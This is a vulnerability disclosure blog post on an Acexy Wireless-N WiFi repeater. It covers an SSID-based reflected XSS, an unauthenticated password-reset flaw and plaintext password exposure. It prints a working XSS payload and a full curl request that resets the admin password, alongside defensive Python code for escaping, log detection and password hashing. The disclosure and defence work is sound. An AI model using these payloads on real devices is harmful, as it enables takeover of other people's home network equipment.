Acexy Wireless-N WiFi Repeater Vulnerabilities

Security analysis of some low-cost WiFi Repeaters

[As you may have noticed, this blog post is in progress and has been made public primarily to make the CVE details public. Naturally, each vulnerability description has to be considered “as is” and won’t be modified once the story is finished]

IoT devices are spreading fast nowadays, and sometimes low-cost and poorly configured ones might severely harm the security and privacy of your home network, including the devices connected to it.

The problem is exacerbated by the huge number of vendors selling these devices at quite low prices, which makes them the most attractive choice for the majority of people. However, what most people should understand is that their low-cost devices might lead to… well… other kinds of costs!
These can, of course, be higher than what you would have spent by choosing a different WiFi Repeater.

Why these devices?

  • They are not too expensive (about 15€)
  • They are among the very first results provided by Amazon when you search for keywords like “WiFi Repeater/Extender”.

    Additionally, the second device is considered an Amazon’s Choice.
  • ..

The following sections summarize the vulnerabilities I found as a result of my analysis. The next section will briefly discuss, for each device analysed, the vulnerabilities with an assigned CVE ID I’ve been able to find, as well as other minor security-related issues affecting the involved devices.

To fix such vulnerabilities you should update your device’s firmware to the latest available version, but sometimes, with really bad firmware (or bugs?!), you won’t even be allowed to download software updates, and this leaves you with only two choices: either you stay vulnerable or you replace the device altogether.

Device (1/3): Acexy Wireless-N WiFi Repeater REV 1.0
Firmware: 28.08.06.1

CVE-2021-28160 — SSID Reflected XSS

As with every WiFi Repeater, you have to choose the wireless network whose range you wish to extend, providing the password (if any) of its wireless AP.

The page shown above, “/repeater.html”, allows you to select the network and displays the available wireless APs without applying any kind of sanitization to the data that is added to the HTML document rendered by the browser.

Therefore, by setting the SSID of a wireless network to something like the following, you can get JavaScript code executed every time a user visits the page repeater.html or, more generally, whenever a user simply clicks on the “Repeater Wizard” section of the homepage.

<img src=no onerror=alert(1) foo
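To show why the flaw is an output-encoding problem rather than an input-length one, here is an added example (my own code, not the device firmware or anything from the post) that renders a scanned SSID list the way the vulnerable page does and the way a fixed page should. The SSID payload quoted above is exactly 32 bytes, so it is a perfectly legal 802.11 SSID; the markup of the `<select>` element and the sample SSIDs are constructed for the demonstration.

```python
import html

# Constructed sample scan result; the last entry is the SSID payload quoted in the
# post. It is exactly 32 bytes, the 802.11 maximum, so it is a valid SSID.
SCANNED_SSIDS = [
    "HomeNetwork",
    "Cafe Free WiFi",
    "<img src=no onerror=alert(1) foo",
]


def is_valid_ssid(ssid: str) -> bool:
    """802.11 allows SSIDs of 0..32 octets. Worth checking as defence in depth,
    but it is not a fix on its own: the payload above passes this check."""
    return len(ssid.encode("utf-8")) <= 32


def render_ssid_list_unsafe(ssids) -> str:
    """Mimics the flaw in /repeater.html: SSIDs are concatenated into the page
    as-is, so any markup contained in an SSID is interpreted by the browser."""
    options = "".join(f'<option value="{s}">{s}</option>' for s in ssids)
    return f'<select name="ssid">{options}</select>'


def render_ssid_list_safe(ssids) -> str:
    """Hardened form: every SSID is HTML-escaped for both the attribute context
    (value="...") and the text context before it reaches the document."""
    options = "".join(
        f'<option value="{html.escape(s, quote=True)}">'
        f'{html.escape(s, quote=True)}</option>'
        for s in ssids
    )
    return f'<select name="ssid">{options}</select>'


def contains_live_markup(rendered: str, payload: str) -> bool:
    """True when the payload survived rendering as raw markup, i.e. the browser
    would parse it as an element instead of displaying it as text."""
    return payload in rendered


if __name__ == "__main__":
    payload = SCANNED_SSIDS[-1]
    print("valid SSID length:", is_valid_ssid(payload))
    print("unsafe page keeps payload as markup:",
          contains_live_markup(render_ssid_list_unsafe(SCANNED_SSIDS), payload))
    print("safe page keeps payload as markup:  ",
          contains_live_markup(render_ssid_list_safe(SCANNED_SSIDS), payload))
```

The safe renderer escapes the same value twice on purpose: once for the attribute and once for the element body, since each is a separate HTML context. An SSID is attacker-controlled by design (anyone nearby can broadcast one), so it has to be treated as untrusted input wherever the firmware writes it into a page.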

CVE-2021-28936 — Improper Access Control on password reset requests

An Improper Access Control (CWE-284) vulnerability allows any device to change the Web management interface password by sending just one specially crafted HTTP GET request, without requiring any previous authentication.

In order to exploit the vulnerability you need to know the current management interface account name (by default, it is admin).
The following curl command changes the management interface password to “mystrongpass123”, assuming the account name is admin and the IP address of the device is the default one (192.168.10.1).

curl -i -s -o /dev/null -w "%{http_code}" -k -X $'GET' \
-H $'Host: 192.168.10.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Connection: close' -H $'Referer: http://192.168.10.1/password.html' -H $'Content-Length: 4' \
--data-binary $'\x0d\x0a\x0d\x0a' \
$'http://192.168.10.1/login.htm?CMD=SYS&GO=login.htm&SET0=18416128=en&SET1=17498624=admin&SET2=16843264=mystrongpass123&rd=0.7548039925199851&_=1615725324336'

Once the command has finished, just try to log in with the password you provided.
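Since the device cannot be patched, the practical defence is to notice such requests on the LAN. The following added example (my own detection logic, not part of the post) scans HTTP access-log lines for CMD=SYS requests to /login.htm that rewrite the management credentials. The setting identifiers 17498624 (username) and 16843264 (password) are inferred from the curl request above; the common-log-style line format and the sample lines are constructed, and the alert records deliberately carry only which settings changed, never the submitted values.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Setting identifiers inferred from the curl request in the post:
# SET1=17498624=admin sets the username, SET2=16843264=... sets the password.
CREDENTIAL_SETTINGS = {"17498624": "username", "16843264": "password"}

# Constructed access-log lines in a common-log-like format. The second line
# mirrors the request from the post with the password value replaced; the third
# only changes the UI language and must not be flagged.
SAMPLE_LOG = """\
192.168.10.23 - [14/Mar/2021:12:15:20 +0000] "GET /index.html HTTP/1.1" 200
192.168.10.23 - [14/Mar/2021:12:15:24 +0000] "GET /login.htm?CMD=SYS&GO=login.htm&SET0=18416128=en&SET1=17498624=admin&SET2=16843264=REDACTED&rd=0.75&_=1615725324336 HTTP/1.1" 200
192.168.10.45 - [14/Mar/2021:12:16:02 +0000] "GET /login.htm?CMD=SYS&GO=login.htm&SET0=18416128=it&rd=0.12 HTTP/1.1" 200
192.168.10.77 - [14/Mar/2021:12:17:41 +0000] "GET /login.htm?CMD=SYS&GO=login.htm&SET0=17498624=root&rd=0.33 HTTP/1.1" 200
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)


def parse_settings(target: str) -> dict:
    """Return {setting_id: value} for every SETn=<id>=<value> query parameter.
    parse_qsl splits on the first '=', so the value still holds '<id>=<value>'."""
    settings = {}
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key.startswith("SET") and "=" in value:
            setting_id, _, setting_value = value.partition("=")
            settings[setting_id] = setting_value
    return settings


def detect_credential_changes(log_text: str) -> list:
    """Flag CMD=SYS requests to /login.htm that rewrite the username or password.
    Only the names of the changed settings are recorded, so the alert log never
    ends up holding the new password itself."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        query = dict(parse_qsl(url.query, keep_blank_values=True))
        if url.path != "/login.htm" or query.get("CMD") != "SYS":
            continue
        changed = sorted(
            CREDENTIAL_SETTINGS[sid]
            for sid in parse_settings(m["target"])
            if sid in CREDENTIAL_SETTINGS
        )
        if changed:
            alerts.append({"ts": m["ts"], "src": m["src"], "changed": changed})
    return alerts


if __name__ == "__main__":
    for alert in detect_credential_changes(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["src"]} changed {", ".join(alert["changed"])}')
```

Because the request is a plain GET (the post notes the interface is HTTP only), the full query string is visible to any passive capture on the LAN, so the same matching can run over a packet capture or a proxy log rather than a log on the device, which has none you can reach. Any hit from a host that is not your own management machine is worth treating as a compromise of the repeater.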

CVE-2021-28937 — Plaintext password reflected in /password.html HTML page

The web management interface password is included in the /password.html HTML page, which contains a form for changing the username or the password.

To test this vulnerability, just visit the URL http://192.168.10.1/password.html and inspect the returned HTML with any browser you prefer.

This kind of password disclosure also implies that the device stores the password in plaintext, without computing any hash value.
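Both halves of this issue, the secret embedded in the page and the plaintext storage behind it, go away once the firmware keeps only a salted hash and asks for the old password instead of echoing it. As an added example (my own code, not the device's), the block below stores a PBKDF2-HMAC-SHA256 verifier, checks candidates against it in constant time, and renders a change-password form that never contains the current secret. The store layout, the form markup and the iteration count are constructed for the demonstration.

```python
import hashlib
import hmac
import html
import os

# Constructed value: kept modest so the example runs quickly. On a real device
# it should be raised as far as the CPU budget allows.
ITERATIONS = 100_000


def make_verifier(password: str) -> str:
    """Derive a salted PBKDF2-HMAC-SHA256 verifier. A fresh random salt means
    two users with the same password get different stored values."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, verifier: str) -> bool:
    """Recompute the derivation with the stored salt and compare in constant time."""
    algo, iters, salt_hex, digest_hex = verifier.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


def render_password_page(username: str) -> str:
    """Change-password form that never embeds the current password. The user
    proves knowledge of it by typing it again, so there is nothing to reflect."""
    return (
        '<form method="post" action="/password.html">'
        f'<input name="user" value="{html.escape(username, quote=True)}">'
        '<input type="password" name="old_pass" value="">'
        '<input type="password" name="new_pass" value="">'
        "</form>"
    )


def change_password(store: dict, username: str, old_password: str, new_password: str) -> bool:
    """Apply a change only when the caller proves knowledge of the old password;
    this is the check the vulnerable CMD=SYS handler is missing."""
    verifier = store.get(username)
    if verifier is None or not verify_password(old_password, verifier):
        return False
    store[username] = make_verifier(new_password)
    return True


if __name__ == "__main__":
    # Constructed credential store: username -> verifier, no plaintext anywhere.
    store = {"admin": make_verifier("correct horse")}
    print("stored verifier:", store["admin"])
    print("wrong old password accepted:", change_password(store, "admin", "wrong", "newpass"))
    print("right old password accepted:", change_password(store, "admin", "correct horse", "newpass"))
    print("page:", render_password_page("admin"))
```

With this layout there is simply no plaintext for /password.html to leak, and an unauthenticated request cannot change the credentials because the handler demands the old password. The remaining exposure is the HTTP-only transport noted in the next section, which is why such a form should only ever be served over TLS or on a management network you trust.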

Others

  • HTTPS is never used and HTTP traffic can be easily intercepted on a LAN.

Username and password are sent unencrypted during authentication and, additionally, every time you visit /password.html you give a potential attacker the chance to read your current username and password (both included in the HTML document).

  • Telnet service listening on port 23.

The default username is easy to guess (admin) but the password is not among the most trivial or common ones. I didn’t manage to guess the password, though you might be luckier or just better than me at generating password lists.
